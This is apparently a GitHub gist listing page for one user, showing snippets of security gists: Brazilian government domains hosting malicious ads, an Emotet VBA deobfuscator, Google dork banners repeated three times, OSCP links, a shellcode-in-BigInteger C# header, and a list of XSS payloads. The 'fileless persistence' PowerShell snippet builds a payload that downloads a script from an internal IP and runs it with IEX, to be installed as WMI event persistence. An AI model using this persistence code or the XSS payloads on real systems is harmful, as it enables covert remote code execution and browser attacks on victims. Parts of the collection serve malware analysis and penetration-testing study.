24x7x365 SUPPORT http://www.captiongenerator.com/320492/Offsec-Student-Admins
http://www.fuzzysecurity.com/tutorials/16.html https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
. NoThrowForwardIt
NoThrowForwardIt
/ gist:e49ccd0c4ecd712c1a656e81a04694b4
Created
January 28, 2024 12:09
Brazilian gov with malicious ads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Domains: | |
| - dapyp.cmi.rj.gov.br | |
| - angra.rj.gov.br | |
| - arapoti.pr.gov.br | |
| - atos.campobom.rs.gov.br | |
| - belacruz.ce.gov.br | |
| - biblioteca.cofen.gov.br | |
| - camarabp.sp.gov.br | |
| - cimpolinorte.es.gov.br |
NoThrowForwardIt
/ deobfuscator.py
Created
January 18, 2022 15:18
— forked from DissectMalware/deobfuscator.py
VBA deobfuscation - Emotet XLSM
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from oletools.olevba import VBA_Parser, TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML, TYPE_MHTML | |
| import sys | |
| import re | |
| vbaparser = VBA_Parser(sys.argv[1]) | |
| replace_regex = r"\s*([^=]+)\s*=\s*Replace\(\s*([^,]+)\s*,\s*\"([^,]*)\"\s*,\s*\"([^,]*)\"\s*\)" | |
| replace = re.compile(replace_regex, re.MULTILINE) | |
| regex_url = "http(s)?://[^,\"]+" |
NoThrowForwardIt
/ google-dorks
Created
August 9, 2020 12:27
— forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
NoThrowForwardIt
/ google-dorks
Created
August 9, 2020 12:27
— forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
NoThrowForwardIt
/ google-dorks
Created
August 9, 2020 12:27
— forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
NoThrowForwardIt
/ gist:ac1febb6e57ff84ebff2ba9c95485e2e
Created
April 26, 2019 10:23
fileless persistense
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Credits to @mattifestion for his awesome work on WMI and Powershell Fileless Persistence. This script is an adaptation of his work. | |
| #> | |
| function Install-Persistence{ | |
| $Payload = "((new-object net.webclient).downloadstring('http://172.16.134.129:80/a'))" | |
| $EventFilterName = 'Cleanup' | |
| $EventConsumerName = 'DataCleanup' | |
| $finalPayload = "powershell.exe -nop -c `"IEX $Payload`"" |
NoThrowForwardIt
/ oscp_links.md
Created
March 10, 2019 23:54
— forked from cokebottle/oscp_links.md
Useful OSCP Links
NoThrowForwardIt
/ windows-toolkit.md
Created
January 1, 2019 23:28
— forked from jthuraisamy/windows-toolkit.md
Windows Toolkit
| IDA Plugins | Preferred | Neutral | Unreviewed |
|---|
NoThrowForwardIt
/ Numerics.cs
Created
March 2, 2018 00:34
Shellcode Stuffed Into A System.Numerics.BigInteger - Cause You Know Why Not ;-)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body oninput=javascript:alert(1)><input autofocus> | |
| <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> | |
| <frameset onload=javascript:alert(1)> | |
| <table background="javascript:javascript:alert(1)"> | |
| <!--<img src="--><img src=x onerror=javascript:alert(1)//"> | |
| <comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> | |
| <![><img src="]><img src=x onerror=javascript:alert(1)//"> | |
| <style><img src="</style><img src=x onerror=javascript:alert(1)//"> | |
| <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> | |
| <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> |
NewerOlder